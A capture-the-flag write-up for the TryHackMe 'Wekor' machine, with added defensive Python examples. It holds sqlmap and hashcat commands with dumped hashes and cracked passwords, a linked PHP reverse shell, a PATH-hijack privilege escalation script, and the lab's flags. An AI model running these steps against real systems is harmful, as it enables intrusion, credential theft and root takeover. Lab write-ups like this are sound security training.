d3vyce 095a13b2c9
add: writeup-ctf
2024-03-02 21:49:07 +01:00

---
title: "Writeup - Wekor (THM)"
date: 2022-04-17
slug: "writeup-wekor-thm"
type: "writeup-ctf"
---
This is a writeup for the [Wekor](https://tryhackme.com/room/wekorra) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of the target using the following command:
```bash
nmap -sV -T4 -Pn 10.10.11.146
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp: SSH (OpenSSH 8.2)
- 80/tcp: HTTP web server (Apache 2.4.41)
## Exploit
I start by enumerating the pages of the website.
![](img/image-2.webp)
I find a `robots.txt` file in which the following pages are listed:
```text
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
```
While exploring I come across the following message:
```text
Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot !
```
So there is a second site hosted in the `/it-next` folder:
![](img/image-3.webp)
After some research I find an `Apply coupon` field on the `it_cart.php` page. I capture the request with Burp, then run `sqlmap` on it to list the databases.
```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ sqlmap -r request.txt --dbs --batch
[...]
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[16:07:49] [INFO] fetching database names
available databases [6]:
[*] coupons
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[16:07:49] [INFO] fetched data logged to text files under '/home/d3vyce/.local/share/sqlmap/output/wekor.thm'
[*] ending @ 16:07:49 /2022-04-13/
```
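The coupon lookup is injectable because the user-supplied code is concatenated into the SQL text. The following is an added example, not code from the Wekor machine (the real `it_cart.php` query is not shown on the page): a stand-in coupon lookup written both ways against an in-memory SQLite table, with a constructed table and sample coupon codes. It also backs the "prevent SQL injection" recommendation at the end of the writeup.

```python
"""Coupon lookup: the injectable pattern beside its parameterized form.

Added example, not code from the Wekor machine. The table name, columns and
coupon codes are constructed for the demo; MySQL is replaced by SQLite so the
script runs offline, but the two query styles behave the same on either.
"""
import sqlite3

SAMPLE_COUPONS = [  # constructed sample data
    ("WELCOME10", 10),
    ("VIP50", 50),
]


def make_db():
    """In-memory database standing in for the `coupons` database from the dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, discount INTEGER)")
    conn.executemany("INSERT INTO coupons VALUES (?, ?)", SAMPLE_COUPONS)
    conn.commit()
    return conn


def lookup_coupon_vulnerable(conn, code):
    """String concatenation: the user's input becomes part of the SQL grammar."""
    query = "SELECT code, discount FROM coupons WHERE code = '" + code + "'"
    return conn.execute(query).fetchall()


def lookup_coupon_safe(conn, code):
    """Parameterized query: the value travels separately from the SQL text,
    so quotes in it can never change the statement's structure."""
    query = "SELECT code, discount FROM coupons WHERE code = ?"
    return conn.execute(query, (code,)).fetchall()


def demo():
    """Run a valid code and the textbook tautology through both versions."""
    conn = make_db()
    tautology = "' OR '1'='1"  # the kind of probe sqlmap sends to detect injection
    return {
        "vulnerable_valid": lookup_coupon_vulnerable(conn, "VIP50"),
        "vulnerable_injected": lookup_coupon_vulnerable(conn, tautology),
        "safe_valid": lookup_coupon_safe(conn, "VIP50"),
        "safe_injected": lookup_coupon_safe(conn, tautology),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:20s} -> {rows}")
```

The vulnerable version returns every coupon for the tautology because the statement became `WHERE code = '' OR '1'='1'`; the parameterized version looks for a coupon literally named `' OR '1'='1` and returns nothing. Escaping or "sanitizing" input is the fragile alternative; binding parameters is what actually removes the bug.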
I find a `wordpress` database and dump it with the following command:
```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ sqlmap -r request.txt -D wordpress --dump --batch
[...]
[4 entries]
+------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1 | http://site.wekor.thm/wordpress | $P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B. | admin@wekor.thm | admin | 0 | admin | admin | 2021-01-21 20:33:37 | <blank> |
| 5743 | http://jeffrey.com | $P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10 | jeffrey@wekor.thm | wp_jeffrey | 0 | wp jeffrey | wp_jeffrey | 2021-01-21 20:34:50 | 1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0 |
| 5773 | http://yura.com | $P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/ | yura@wekor.thm | wp_yura | 0 | wp yura | wp_yura | 2021-01-21 20:35:27 | <blank> |
| 5873 | http://eagle.com | $P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/ (xxxxxx) | eagle@wekor.thm | wp_eagle | 0 | wp eagle | wp_eagle | 2021-01-21 20:36:11 | <blank> |
+------+---------------------------------+---------------------------------------------+-------------------+------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
[...]
```
In the dump I find four user/hash pairs. I put the hashes in a file and run `hashcat` against them.
```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ hashcat -m 400 hash wordlist/rockyou.txt
[...]
$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/:xxxxxx (eagle)
$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10:rockyou (jeffrey)
$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/:soccer13 (yura)
[...]
```
After a few seconds, we have all the passwords except the admin's. Now that we have credentials, we need to find the WordPress site, so I launch a subdomain scan.
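The `$P$B...` strings in the dump are phpass "portable" hashes, which is why `-m 400` is the right hashcat mode and why a wordlist attack finishes in seconds: each guess costs only a salted MD5 repeated 2^13 times. The following is an added example, not code from the page or from WordPress itself: a re-implementation of the phpass check, so the format (cost character, 8-character salt, custom base64 alphabet) can be read off a hash. The password and salt in `demo()` are constructed; it does not re-check the dumped hashes.

```python
"""Portable PHP password hashes (phpass, the `$P$` format WordPress stores).

Added example re-implementing the phpass algorithm; not the page's code.
Layout of a hash: "$P$" + cost char + 8-char salt + 22-char encoded digest.
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass's own base64 variant (little-endian bit packing, not RFC 4648)."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_rounds(stored):
    """Iteration count encoded in the 4th character: 'B' -> 2**13 = 8192 MD5 calls."""
    log2 = ITOA64.index(stored[3])
    if log2 < 7 or log2 > 30:  # range phpass itself accepts
        raise ValueError("invalid cost character")
    return 1 << log2


def phpass_hash(password, salt, cost_char="B"):
    """Compute a `$P$` hash: md5(salt + pw), then `rounds` times md5(prev + pw)."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 itoa64 characters")
    setting = "$P$" + cost_char + salt
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(phpass_rounds(setting)):
        digest = hashlib.md5(digest + pw).digest()
    return setting + _encode64(digest, 16)


def phpass_verify(password, stored):
    """Constant-time comparison of a candidate against a stored `$P$` hash."""
    if len(stored) != 34 or not stored.startswith("$P$"):
        return False
    computed = phpass_hash(password, stored[4:12], stored[3])
    return hmac.compare_digest(computed, stored)


def demo():
    """Round-trip with a constructed salt and password (not the dumped hashes)."""
    h = phpass_hash("correct horse", "abcdefgh")  # constructed values
    return {
        "rounds": phpass_rounds(h),
        "length": len(h),
        "ok": phpass_verify("correct horse", h),
        "wrong": phpass_verify("not it", h),
    }


if __name__ == "__main__":
    print(demo())
```

The cost is the only tunable, and the `B` seen in the dump means 8192 MD5 rounds, cheap enough for a GPU to test millions of guesses per second. Modern WordPress still emits this format by default, so the practical defences are the ones the writeup lists: long, unique passwords, plus limiting who can log in at all.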
![](img/image-4.webp)
I find the `site` subdomain and add it to `/etc/hosts`, then I browse to it. On this page, I find the following text:
```text
Hi there!
Nothing here for now, but there should be an amazing website here in about 2 weeks, SO DON'T FORGET TO COME BACK IN 2 WEEKS!
- Jim
```
This doesn't give me much, so I launch a page scan on this subdomain.
![](img/image-5.webp)
After a few seconds I finally find the WordPress site!
![](img/image-6.webp)
So I go to the `wp-admin` page to log in to the admin panel. After trying the user `jeffrey`, I realize that he doesn't have admin permissions, so I test the user `yura` and it works. I can now modify the content of the `404.php` page of the `twentytwentyone` theme to add this [reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php).
By browsing to the following page I execute the PHP code:
```text
http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php
```
I now have a reverse shell, but I don't have access to the first flag.
![](img/image-7.webp)
So I look for a service that could let me switch to another user. Among the locally open ports, I find port 11211:
![](img/image-8.webp)
After some research I find the following page of the [HackTricks](https://book.hacktricks.xyz/pentesting/11211-memcache) blog. After some experimentation, I manage to get the credentials of the user `Orka` out of the cache.
![](img/image-9.webp)
I can now switch user and get the first flag.
```bash
Orka@osboxes:~$ cat user.txt
cat user.txt
1a26a6d51c0172400add0e297608dec6
```
## Privilege escalation
I start by checking the user's sudo rights. Interestingly, my user is allowed to run the `bitcoin` program as root.
![](img/image-10.webp)
I try to run it, but without success: it asks for a password first.
![](img/image-11.webp)
So I extract the strings from the binary and find the following in the result:
```bash
Orka@osboxes:~/Desktop$ strings bitcoin
[...]
Enter the password :
password
Access Denied...
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins :
Sorry, This is not a valid amount!
python /home/Orka/Desktop/transfer.py %c
[...]
```
The password for the program is probably `password`, and after authentication it runs a Python script. What is interesting is that `python` is invoked without an absolute path, so it is resolved through `$PATH`. Combined with the fact that I have write permission in `/usr/sbin`, which is in `$PATH`, I can place my own `python` there with the following commands:
```bash
touch /usr/sbin/python
echo '#!/bin/bash' > /usr/sbin/python
echo '/bin/bash' >> /usr/sbin/python
chmod +x /usr/sbin/python
```
I now run the `bitcoin` program with `sudo` and enter the password.
![](img/image-12.webp)
I am now root on the machine and can get the last flag.
```bash
root@osboxes:~/Desktop# cat /root/root.txt
cat /root/root.txt
f4e788f87cc3afaecbaf0f0fe9ae6ad7
```
## Recommendations
To patch this host I think the following actions would be necessary:
- Sanitize all user input to prevent SQL injection
- Use strong passwords
- Set up Memcached authentication
- Use absolute paths when calling programs from scripts
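The last recommendation addresses the `bitcoin` binary, but the privilege escalation also needed a writable directory on `$PATH`, and that is the condition a defender can check for on every host. The following is an added example, not part of the writeup: an audit of a PATH value that reports entries an unprivileged user could plant a binary in (world-writable without the sticky bit, not owned by the trusted user, missing, relative or empty). `demo()` builds a constructed PATH under a temporary directory and treats the current user as the trusted owner; on a real host you would run `audit_path(os.environ["PATH"])` as root with the default `trusted_uid=0`.

```python
"""Audit a PATH value for directories an unprivileged user could write a binary into.

Added example, not part of the writeup. The directories in demo() are
constructed under a temporary directory; the real /usr/sbin is not touched.
"""
import os
import stat
import tempfile


def audit_path(path_value, trusted_uid=0, trusted_gid=0):
    """Return (entry, reason) for each PATH entry through which a bare command
    name (such as `python`) could resolve to something attacker-controlled."""
    findings = []
    for entry in path_value.split(os.pathsep):
        if entry == "":
            findings.append((entry, "empty entry: resolves to the current directory"))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative entry"))
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            findings.append((entry, "missing directory (could be created later)"))
            continue
        mode = st.st_mode
        if not stat.S_ISDIR(mode):
            findings.append((entry, "not a directory"))
        elif mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            findings.append((entry, "world-writable without sticky bit"))
        elif mode & stat.S_IWGRP and st.st_gid != trusted_gid:
            findings.append((entry, "group-writable by an untrusted group"))
        elif st.st_uid != trusted_uid:
            findings.append((entry, "not owned by the trusted user"))
    return findings


def demo():
    """Constructed PATH: one sane directory, one world-writable, one missing, one empty."""
    with tempfile.TemporaryDirectory() as root:
        good = os.path.join(root, "good")
        writable = os.path.join(root, "writable")
        gone = os.path.join(root, "gone")  # never created
        os.mkdir(good)
        os.chmod(good, 0o755)
        os.mkdir(writable)
        os.chmod(writable, 0o777)  # the /usr/sbin situation from the writeup
        path_value = os.pathsep.join([good, writable, gone, ""])
        findings = audit_path(path_value, os.geteuid(), os.getegid())
        # Report basenames so the output does not depend on the temp dir name.
        return [(os.path.basename(e) or "<empty>", r) for e, r in findings]


if __name__ == "__main__":
    for entry, reason in audit_path(os.environ.get("PATH", "")):
        print(f"{entry!r}: {reason}")
    print(demo())
```

Note that `sudo`'s `secure_path` does not help here: it only fixes which directories are searched, and `/usr/sbin` is in it by default, so a writable system directory defeats it. The fix is the file permission itself (root-owned, mode 755) together with the absolute path in the program.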